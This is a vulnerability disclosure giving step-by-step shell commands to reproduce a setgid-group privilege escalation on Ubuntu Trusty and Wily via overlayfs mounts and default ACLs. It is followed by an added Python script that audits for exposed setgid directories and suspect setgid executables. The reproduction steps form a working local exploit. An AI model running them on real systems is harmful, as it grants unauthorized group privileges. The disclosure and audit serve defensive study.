On Ubuntu Trusty, and also on Ubuntu Wily, the following sequence allows gaining the group privileges of arbitrary groups that created directories with the properties found using "find / -perm -02020", e.g.
/usr/local/lib/python3.4 root.staff
/var/lib/libuuid libuuid.libuuid
/var/local root.staff
/var/mail root.mail
For Ubuntu Trusty, the following sequence can be used to reproduce the problem:
* In user/mount namespace:
rm -rf Mnt Test
mkdir Mnt Test
mount -t overlayfs -o lowerdir=/var,upperdir=Test overlayfs Mnt
* Outside namespace
setfacl -m d:u:[your unpriv uid]:rwx Test
* Inside:
chmod 02777 Mnt/mail
umount Mnt
* Outside:
~/CreateSetgidBinary Test/mail/escalate /bin/mount x nonexistent-arg
Test/mail/escalate ~/ReportUidGidCwd
For Ubuntu Wily:
* Inside:
mkdir Mnt Test Work
mount -t overlayfs -o lowerdir=/var,upperdir=Test,workdir=Work overlayfs Mnt
* Outside:
setfacl -m d:u::rwx,d:u:[your unpriv uid]:rwx Work/work
* Inside:
chmod 02777 Mnt/mail
umount Mnt
* Outside:
~/CreateSetgidBinary Test/mail/escalate /bin/mount x nonexistent-arg
Test/mail/escalate ~/ReportUidGidCwd
CreateSetgidBinary is from http://www.halfdog.net/Security/2015/SetgidDirectoryPrivilegeEscalation/
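
An added audit example (not part of the original report and not from halfdog.net): it applies the same mode test as "find / -perm -02020" and also lists setgid executables not owned by a trusted uid, which is the kind of file the last step leaves at Test/mail/escalate. The function names and the trusted_uids parameter are assumptions of this example.

```python
import grp
import os
import pwd
import stat

# Same bits as "find / -perm -02020": setgid (02000) plus group-write (00020).
SETGID_GROUP_WRITE = stat.S_ISGID | stat.S_IWGRP

def is_exposed_dir(mode):
    """Directory with both setgid and group-write set."""
    return stat.S_ISDIR(mode) and (mode & SETGID_GROUP_WRITE) == SETGID_GROUP_WRITE

def is_setgid_executable(mode):
    """Regular file with setgid and at least one execute bit."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISGID) and bool(mode & 0o111)

def _name(lookup, ident):
    """Resolve a uid/gid to a name, falling back to the number."""
    try:
        return lookup(ident)[0]
    except KeyError:
        return str(ident)

def _owner(st):
    return _name(pwd.getpwuid, st.st_uid), _name(grp.getgrgid, st.st_gid)

def audit(root, trusted_uids=(0,)):
    """Return (exposed_dirs, suspect_files) as lists of (path, owner, group).

    trusted_uids is an assumption of this example: setgid executables
    owned by these uids are not reported.
    """
    exposed, suspects = [], []
    for dirpath, _dirs, files in os.walk(root, followlinks=False):
        for path in [dirpath] + [os.path.join(dirpath, f) for f in files]:
            try:
                st = os.lstat(path)  # lstat: never follow symlinks
            except OSError:
                continue  # vanished or unreadable entry
            if is_exposed_dir(st.st_mode):
                exposed.append((path, *_owner(st)))
            elif is_setgid_executable(st.st_mode) and st.st_uid not in trusted_uids:
                suspects.append((path, *_owner(st)))
    return exposed, suspects

if __name__ == "__main__":
    dirs, files = audit("/var")
    for kind, rows in (("exposed-dir", dirs), ("setgid-exec", files)):
        for path, owner, group in rows:
            print(f"{kind}\t{path}\t{owner}.{group}")
```

Run it as root so unreadable subtrees are not skipped; output uses the same owner.group form as the listing above.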